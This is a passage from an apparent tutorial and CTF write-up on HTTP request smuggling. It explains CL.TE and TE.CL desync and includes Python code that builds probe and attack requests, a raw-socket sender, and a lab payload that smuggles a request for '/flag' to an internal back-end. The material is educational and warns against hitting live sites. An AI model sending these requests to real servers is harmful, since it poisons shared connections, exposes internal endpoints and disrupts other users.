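# producing an observable timeout.
def build_tecl_probe(host: str) -> bytes:
    body = "0\r\n\r\nx"  # 6 bytes, matching the Content-Length
    head = (
        "POST / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Transfer-Encoding: chunked\r\n"
        "\r\n"
    )
    return (head + body).encode()

probe = build_tecl_probe("vulnerable.example")  # placeholder host
```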
4.) CL.TE –> [Socket poisoning ☠️]
Reason: –> The front-end server uses the CL header and forwards the whole request, including the last character x, to the back-end.
The back-end then processes the first chunk size, which is stated as 0 here, so the remaining part of the request (x) is left unprocessed on the connection. That is how we poison the socket.
Note:
This approach will poison the backend socket with an X, potentially harming legitimate users. Fortunately, by always running the prior detection method first, we can rule out that possibility.
4. Confirming desync 👍
+ In this step we'll see the full potential of request smuggling: proving that back-end socket poisoning is possible.
+ To do this, we'll issue a request designed to poison a back-end socket, followed by a request that will hopefully fall victim to the poison.
+ If the first request causes an error, the back-end server may decide to close the connection, discarding the poisoned buffer and breaking the attack.
+ Try to avoid this by targeting an endpoint that is designed to accept a POST request, and by preserving any expected GET/POST parameters.
Note:
Some sites have multiple distinct backend systems, with the front-end looking at each request's method, URL, and headers to decide where to route it. If the victim request gets routed to a different back-end than the attack request, the attack will fail. As such, the 'attack' and 'victim' requests should initially be as similar as possible.
Fig 11. Confirming Desync
[Fig 11.] shows the two different methods, and that is how we can perform and confirm the smuggling attack.
CL.TE –> If the attack is successful, the victim request (in green) will get a 404 response.
TE.CL –> The TE.CL attack looks similar, but the need for a closing chunk means we must specify all the headers ourselves and place the victim request in the body. Ensure the Content-Length in the prefix is slightly larger than the body.
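As a sketch of the CL.TE confirmation step, the following builds an attack request whose smuggled prefix turns the next request on the poisoned socket into a request for a non-existent path (yielding the 404 described above). The `/search` endpoint, the `q=smuggling` parameter, and the host are illustrative placeholders, not from the original post.

```python
# Build a CL.TE desync attack request. Content-Length covers the whole
# body, so a CL-based front-end forwards everything; a TE-based
# back-end stops reading at the 0 chunk, leaving the smuggled prefix
# unprocessed on the socket, where it prepends the victim's request.
def build_clte_attack(host: str, smuggled_prefix: str) -> bytes:
    chunk = "q=smuggling&x="              # placeholder POST parameter
    body = (
        f"{len(chunk):x}\r\n{chunk}\r\n"  # one well-formed chunk
        "0\r\n\r\n"                       # terminating chunk for the back-end
        + smuggled_prefix                 # left behind to poison the socket
    )
    head = (
        "POST /search HTTP/1.1\r\n"       # placeholder endpoint
        f"Host: {host}\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Transfer-Encoding: chunked\r\n"
        "\r\n"
    )
    return (head + body).encode()

attack = build_clte_attack(
    "vulnerable.example",
    "GET /404 HTTP/1.1\r\nFoo: x",  # victim's request gets appended after "x"
)
```

The trailing `Foo: x` header has no final `\r\n`, so the victim's own request line lands on the same line as its value and the combined request hits the smuggled `/404` path.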
Note:
+ If the site is live, another user's request may hit the poisoned socket before yours, which will make your attack fail and potentially upset the user. As a result, this process often takes a few attempts, and on high-traffic sites may require thousands of attempts. Please exercise both caution and restraint, and target staging servers where possible.
5. Explore 👽
An application server validates HTTP request length on the basis of two headers:
1.) Transfer-Encoding
2.) Content-Length
In a live scenario, the server sits behind multiple load balancers, or a front-end and a back-end server, which process the request. We aim to exploit improper validation of the request by the application. Assume we have 4 different scenarios:
1.) The frontend server validates the request length via the Transfer-Encoding header and the backend server via the Content-Length header.
2.) The frontend server validates the request length via the Content-Length header and the backend server via the Transfer-Encoding header.
3.) Both the frontend and backend servers validate the request length via the Content-Length header.
4.) Both the frontend and backend servers validate the request length via the Transfer-Encoding header.
Live Demo:
Fig 12. HTTP request smuggling
GET / HTTP/1.1
Host: 192.168.0.109
Content-Length: 4
Transfer-Encoding: chunked
2c\r\n
GET /path HTTP/1.1\r\n
Host: 127.0.0.1:8080\r\n
\r\n
\r\n
0
In the above example, the server has the TE-CL vulnerability. Let me explain the values one by one.
The "Content-Length" header in the request is set to the size of "2c\r\n", which is 4 bytes.
For the chunk size, we calculate the total size of the smuggled request that forms the content,
including the "\r\n" line feeds.
The "Transfer-Encoding" parser then consumes exactly that many bytes of content, as declared by the chunk size.
Here the content is a simple smuggled HTTP GET request whose size is 44 bytes up to where its headers end; after it, "\r\n" followed by "0" indicates the end of the chunked body.
Decimal 44 converted to hexadecimal gives "2c". We add "2c" before the content because it is the hexadecimal length of that content.
After the "0" we have to add two "\r\n" line feeds and send the request to the server.
If you send the below request to the CTF server, it gives a response containing the flag.
GET /a HTTP/1.1
Host: 192.168.0.109
Content-Length: 4
Transfer-Encoding: chunkedasd
2c
GET /flag HTTP/1.1
Host: 127.0.0.1:8080
0
GET /a HTTP/1.1
Host: 127.0.0.1:8080
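To deliver this request, you have to speak TCP directly: ordinary HTTP client libraries would reject or rewrite the conflicting Content-Length/Transfer-Encoding headers. Below is a minimal sketch that assembles the exploit bytes from the example above and defines a raw-socket sender (the send itself is left commented out, since it needs the lab server from the example to be running).

```python
import socket

# Raw bytes of the exploit request from the CTF example above.
payload = (
    b"GET /a HTTP/1.1\r\n"
    b"Host: 192.168.0.109\r\n"
    b"Content-Length: 4\r\n"
    b"Transfer-Encoding: chunkedasd\r\n"
    b"\r\n"
    b"2c\r\n"                     # 0x2c = 44 bytes of chunk data follow
    b"GET /flag HTTP/1.1\r\n"
    b"Host: 127.0.0.1:8080\r\n"
    b"\r\n"
    b"\r\n"                       # end of the 44-byte chunk
    b"0\r\n"
    b"\r\n"
    b"GET /a HTTP/1.1\r\n"
    b"Host: 127.0.0.1:8080\r\n"
    b"\r\n"
)

def send_raw(host: str, port: int, data: bytes) -> bytes:
    """Send raw bytes over TCP and collect whatever the server returns."""
    with socket.create_connection((host, port), timeout=10) as s:
        s.sendall(data)
        chunks = []
        try:
            while True:
                part = s.recv(4096)
                if not part:
                    break
                chunks.append(part)
        except socket.timeout:
            pass
        return b"".join(chunks)

# Example (requires the lab server from the write-up to be reachable):
# print(send_raw("192.168.0.109", 80, payload).decode(errors="replace"))
```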
- LAB - HTTP request smuggling